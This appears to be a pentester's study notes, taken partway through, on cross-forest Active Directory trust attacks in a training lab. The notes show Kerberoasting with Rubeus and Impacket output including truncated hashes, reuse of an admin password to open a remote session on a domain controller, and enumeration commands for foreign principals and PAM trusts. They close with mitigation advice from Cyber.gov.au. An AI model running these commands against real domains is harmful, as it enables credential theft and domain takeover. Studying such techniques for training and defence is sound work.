  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : mssqlsvc
[*] Target Domain          : FREIGHTLOGISTICS.LOCAL
[*] Searching path 'LDAP://ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/DC=FREIGHTLOGISTICS,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=mssqlsvc)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

[*] SamAccountName         : mssqlsvc
[*] DistinguishedName      : CN=mssqlsvc,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
[*] ServicePrincipalName   : MSSQLsvc/sql01.freightlogstics:1433
[*] PwdLastSet             : 3/24/2022 12:47:52 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstics:1433@FREIGHTLOGISTICS.LOCAL*$<SNIP>

Windows - Admin password reuse

Enumerate groups with users that do not belong to the domain, also known as foreign group membership

PS C:\htb> Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

GroupDomain             : FREIGHTLOGISTICS.LOCAL
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain            : FREIGHTLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS
                          TICS,DC=LOCAL

PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

INLANEFREIGHT\administrator

PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
   Primary Dns Suffix  . . . . . . . : FREIGHTLOGISTICS.LOCAL
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL

Linux - Cross Forest Kerberoast

$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName                 Name      MemberOf                                                PasswordLastSet             LastLogon  Delegation 
-----------------------------------  --------  ------------------------------------------------------  --------------------------  ---------  ----------
MSSQLsvc/sql01.freightlogstics:1433  mssqlsvc  CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL  2022-03-24 15:47:52.488917  <never> 

-request flag added gives us the TGS ticket

$ GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley  

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName                 Name      MemberOf                                                PasswordLastSet             LastLogon  Delegation 
-----------------------------------  --------  ------------------------------------------------------  --------------------------  ---------  ----------
MSSQLsvc/sql01.freightlogstics:1433  mssqlsvc  CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL  2022-03-24 15:47:52.488917  <never>               


$krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$FREIGHTLOGISTICS.LOCAL/mssqlsvc*$10<SNIP>

Cross Forest Trust - TGT Delegation across

TGT Delegation is disabled by default and must be explicitly enabled across a trust for the trusted (target) forest

Enumeration

netdom trust trustingforest.local /domain:trustedforest.local /EnableTgtDelegation

# AD Module - Run on trusting forest DC 
Get-ADTrust -server trustingforest.local -Filter *

If TGT Delagation is enable, Unconstrained Delegation can be used

Trustee and Resource Delegation

Cross Forest Trust - Foreign Security Principals (FSP)

Enumeration

# PowerView
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose

# AD Module
Get-ADObject -Filter {objectClass-eq"foreignSecurityPrincipal"}

Cross Forest Trust - Bastion - PAM Trust

How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks

Trust - Privileged Access Management - Internal All The Things

PAM trust is usually enabled between a Bastion or Red forest and a production/user forest which it manages. Provides the ability to access the production forest with high privileges without using credentials of the bastion forest

Shadow Principals are created in the bastion domain which are then mapped to DA or EA groups SIDs in the production forest

Get-ADTrust -Filter *
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local

On bastion DC, enumerate if there is a PAM trust:

$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}} -Session $bastiondc

Users members of the Shadow Prinicpals

Invoke-Command -ScriptBlock {Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl} -Session $bastiondc

PSRemoting session on bastion-dc and access production.local

Enter-PSSession 192.168.102.1 -Authentication NegotiateWithImplicitCredential

Mitigation - One way domain trust

The following security controls should be implemented to mitigate a one-way domain trust bypass:

• Limit access to Domain Controllers to only privileged users that require access. This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.

• Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration. Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.

• Encrypt and securely store backups of Domain Controllers and limit access to only Backup Administrators. Backups of Domain Controllers need to be afforded the same security as the actual Domain Controllers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as Domain Controllers.

• Only use Domain Controllers for AD DS and do not install any non-security-related services or applications. This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.

• Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity. Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.

• Disable the Print Spooler service on Domain Controllers. For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.

Detecting and mitigating Active Directory compromises | Cyber.gov.au